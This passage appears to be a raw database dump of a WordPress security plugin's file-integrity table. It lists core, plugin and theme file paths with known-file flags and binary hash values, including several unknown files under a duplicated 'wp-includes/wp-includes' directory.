e��-\n�yV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('������PU��ac��','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YA��G=b�u���','z�,ͥ���t	<{@Y{�iy��s���c�(S�L','',0,'?'),('��nv��Z�YV��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bvA�n�a��1 C��','�g�����z��߶u��p{��!v|�*^��3	�G','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�Oq�W����','a\"��μ�s�f��Ѳ>Zbk�xֲ|<�A','',0,'?'),('�1�`��B���¡]�s','wp-includes/css/dist/editor/editor-styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�0iNj�����','�Lo(��m�ؾT���k�%<P!w�/\n�','',0,'?'),('�y�T\Z*�6\'�vlA�','wp-includes/wp-includes/css/customize-preview-rtl.min.css',0,'E��?��nZ���d�-','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('���\\X����F�3B','wp-includes/wp-includes/category-template.php',0,'K������g�m�=5','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8:Y�Ǐ#��;Y','�g?�.�a��q�B�ٟE�F������o��|�','',0,'?'),('���p���\Zi�䡮','wp-includes/wp-includes/class-wp-hook.php',0,'+%Yj�͑�Q	�^��(','+%Yj�͑�Q	�^��(','�@I*�۷�����}O�&?����8��q�','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e$�(wne��\\��','�_A�q��\'�tu\0���\n��I�\\b��c# %�','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�O47ߺݥ/8X!��','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('���l�IjU�ؿw�','wp-includes/wp-includes/Requests/Exception/HTTP/402.php',0,'`�Y�QP�\nz����G�','`�Y�QP�\nz����G�','�g��NQ	�������/���	�y5������θc','',0,'?'),('�65\nN���x/\0���','wp-content/plugins/wp-cerber/assets/flags/mo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����aM7-�VD��%�','��K����v�FI���ۨ�0g��h�HV�R','',0,'?'),('�#`��B��xpP{XŎ','wp-includes/wp-includes/Text/Diff/Engine/xdiff.php',0,'ֹ�b�t�X8�GX','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��Iܷ��=�7��V�','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��銻~F�a8U�\'v','��j{y˔���5N�1��ޝ���2콲��','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��|#n��\0Y���','\\,���5�^�[A��:p��	�F���R��','',0,'?'),('�N6?`$�Qil�L','wp-content/plugins/wp-cerber/assets/flags/pe.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:���Z�d�D�\'y�1','8����,0��M߀�����҃��WO1q�','',0,'?'),('�SK�8kf�k��X�ҍ\\','wp-content/plugins/wp-cerber/assets/flags/ke.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��K�PS���P�X','�_��/�6�pp����	6�4�zI\0ֱ�Éf','',0,'?'),('�wW� Ů�Q�⍳+��','wp-includes/wp-includes/js/customize-preview-nav-menus.min.js',0,'k�m�	i13-����','k�m�	i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7!ć>pP�:�ޑ\r','6̎2M̥���?��&rA���bĪ�ux^с','',0,'?'),('����	�Q2���e','wp-includes/wp-includes/js/jquery/ui/accordion.min.js',0,'���e�o-�����q','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�f���/�Pe��','�v��H1G�t�+�l�O\r�>��qc���m\\�iS','',0,'?'),('���t�,�!h��O��0','wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js',0,'�*\r�I�͕;t��W��','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('���d�R�OXf�f��','wp-includes/wp-includes/js/wp-embed.min.js',0,'�R%�qU�0�8}_��','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�4u�c&�|�+\'���','wp-includes/wp-includes/images/crystal/document.png',0,'�\'^c�s���D��3T\\','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#uy�d>�ٲ�(H�(','o\'U����~ߡ�e�g�|�(��ې�3,�$','',0,'?'),('�=�IU��c�O�G�','wp-content/plugins/wp-cerber/assets/flags/fo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jX�?c0<G�Ia~�','��lNw�ʭ�!X�uw���_9{-]L��/ܐ','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('�N�s�ئԿ�����','wp-includes/wp-includes/class-wp-image-editor-gd.php',0,'z�RŖ���z`�T��','z�RŖ���z`�T��','�	U� 5�BOu��>F���p_��}�d�.��','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z|���f����?','z�\\��?��+i.��x�7�j���.i����','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('�z��a�٧:mH��U�','wp-includes/wp-includes/js/heartbeat.js',0,'\r���>������q����','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('��!��E��S7�x����','wp-content/wflogs/rules.php',0,'LP���8ϒ��v�K��','LP���8ϒ��v�K��','\n��an	Zx���£����%P$wp\n�;;�~s�','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dl᫁�2�A��\nW�','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2՝�NI 3:_(��','$�C��s���,����ɍ��2�3-��Q�a','',0,'?'),('��o4}+��8��O�','wp-content/plugins/wp-cerber/assets/flags/nc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5�A/g��4�S�H','�.)Po�\\r�d�	!NZ�Ӆ�8��8E��','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���`D\r���7	��','wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php',0,'V���zȒ��`(�lE�','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('��&/��|P	r�[�J','wp-content/themes/shootingstar/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�\"��ke�5#U�,�c','���g��pL���i�|���N%`\rZX%Y�љ','',0,'?'),('��<�^�a�Z�&ٚ|��','wp-includes/wp-includes/class.wp-dependencies.php',0,'�1�n��}%�3t�','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('��!%�ξ�ٜ@*�x','wp-includes/wp-includes/Requests/Exception/Transport/cURL.php',0,'�6T�g*\Z�:	�x7��','�6T�g*\Z�:	�x7��','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6T�g*\Z�:	�x7��','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��f?Yk�EЉ��+V','a�+)	�h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)�	>','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)p†M��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�V�\n#��?�/','� �V�$���1���J�]o*��~4nn�/�O�','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MQ�@��Ǯ���I','����~�r�b�wTN�s��;3f��B���)A','',0,'?'),('��� ���*1�%{�','wp-includes/wp-includes/js/tw-sack.js',0,'��������9>���','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa	y�fh��0v\'u�vm�','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����� v��d','W�Y�0����2w��	5�O���zm� ���^','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�GP�)4��烛�ѳ','wp-includes/wp-includes/class-wp-fatal-error-handler.php',0,'����-����v�','����-����v�','�\n!%�D��F��B�^�s��plhVe��7\'U��','',0,'?'),('�X*����VL	�_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0}3�*�?�v�+,\"','&tT=����ȼitg`^�5����2G��Vcg<','',0,'?'),('�j��I���<꟟��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('��2u�\"<g�@�f�%','wp-content/plugins/wp-cerber/assets/flags/ki.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K���ȶ�','�\"�&9ʈ��7�lZ��P�퇢 �j�/','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('��e�\\��1�tƋ�<	�','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('�������2��f','wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php',0,'���b5lJ�#���v','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)P���gb�ma��','\0Ջ���7�l%�\Zg�26�\re�(�(P��W','',0,'?'),('��pg�nfՃ��:�','wp-includes/wp-includes/class-wp-block-supports.php',0,'}��C��ie�4���','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��u	K��s��w�:','��c��q���F`���o�6y�RO~��5��','',0,'?'),('�8\Z�� �-L۷�=�','wp-includes/wp-includes/js/jquery/ui/core.min.js',0,'I�g{����!�S{5�','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�k\0���V�&c��뀻','wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php',0,'[��`�`b�=E�\"','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('�kIK����V[��	5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� Ք���ۻ����!�|d�p�','',0,'?'),('�z�v��~��ZGL�8','wp-includes/wp-includes/revision.php',0,'Pق�g�OVjX�����','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('���������*_�\"','wp-content/plugins/wp-cerber/assets/flags/tc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sp�I��7��03CP','[���V�c\"��Z}t�a�n��%PB\ZgF�Yw','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�FV�y�o����','���RA��A�ȧ/��r�4H�-@��(\n	�7R4�','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('��\n:�B�Ob�{��g','wp-content/themes/sg-window/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��YG�B��W<e˄','��e�\\I�Uo�oK����}Q�r\"|��w�\\�','',0,'?'),('���k/A�� �ā�','wp-includes/wp-includes/class-wp-network-query.php',0,'G��R�~|8�Z��1[�','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('��Qs|�c�L؜VH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?L�,k��|n�','�r�J�_9���~��uz�{�z������P','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�DeC���y����','�F�h�#>��Tƍŀ\ZO����;�#ؿX�aC�','',0,'?'),('�\Z���M`�yᕙd�','wp-content/plugins/wp-cerber/assets/flags/cm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�.��`�t�sI01','���F�]��g�ZBN��to	Q��m�,�j','',0,'?'),('�2��	�ܚDSX�\Z�','wp-includes/wp-includes/js/jquery/suggest.min.js',0,'s\\+A)���n.;��','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gs�Ib<���w]G��','כ�ppr��›xI�xP^�?	���N�%�u�','',0,'?'),('�n97�I.O�ҝ޿�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4	춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('���W8k�_fʤ��5�','wp-includes/wp-includes/blocks/more/block.json',0,'_�ݜ����_ť;k)M','_�ݜ����_ť;k)M','�6��6Pa����D���@���f6�{��','',0,'?'),('��y�{���2�4�e�i�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/feed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�0�`X>*���','�6�ǠMmXql����W$����s�N!��>tG','',0,'?'),('��k䗐g%\"�M)]�','wp-content/themes/sg-window/inc/social-media-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W��eg0��(','B�\Z\'y�dM��a�s�	6i%?��z��_��b','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('��ul�Z��;B��GB�','wp-includes/wp-includes/SimplePie/IRI.php',0,'\n��9,�zӄycE�','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��{��^vƍ����','Z��%��ĩZ�d�^����m���͖(8��ծ','',0,'?'),('�ج|tRe-�.h�ǛT','wp-includes/wp-includes/js/wp-pointer.js',0,'��8\Z߁@ \r�|�ɛ[d','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^�	�v�4|f�%�Xg','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t��K!��1��vDb','9���:��%�B�Ɖ\\c֏��WpX�	�Q���','',0,'?'),('�=}2�D߶�Q��\n�','wp-includes/wp-includes/css/dist/block-library/common-rtl.css',0,'#�D�P�y��n�\\B�','#�D�P�y��n�\\B�','�AQY��tQ�aK	hˤ�+\r�+�x,`⵽�','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������`�ˎz��\Z�','*���}\0P������y��]�yOr�@�|','',0,'?'),('�DV�ɪl�-�XC��`\\','wp-content/plugins/wp-cerber/assets/flags/cu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝhm!�7���3.�','P�bLO���*]���3�o	}���z�xN��','',0,'?'),('���;)���J+�Z�7f','wp-includes/wp-includes/js/wp-emoji.js',0,'*�����׶H;�q.�','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g_ZY�Y����/','oI���P�g��K7�$v��vxlk���t��Ea�S','',0,'?'),('���G�<m>`7i�8�','wp-includes/wp-includes/css/buttons-rtl.css',0,'i��ԝ]z~c6���g6','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('�����);���-','wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php',0,'�z����ħ7�	�7V\Z','�z����ħ7�	�7V\Z','�p���#4�o�p�p8�^�۰�^�F�+�ף�)l','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('���%�bAH�Q\\���','wp-content/themes/shootingstar/js/infinitescroll-settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��;�.	`��	.�','���0,fx��=����ET���\"9�];��','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s|b$��ѓ<��','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('��o��Sb�)_k�\r�(','wp-includes/wp-includes/js/wp-api.js',0,'@�BY�f��b�b2�lз','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('���j0�ʾ\n��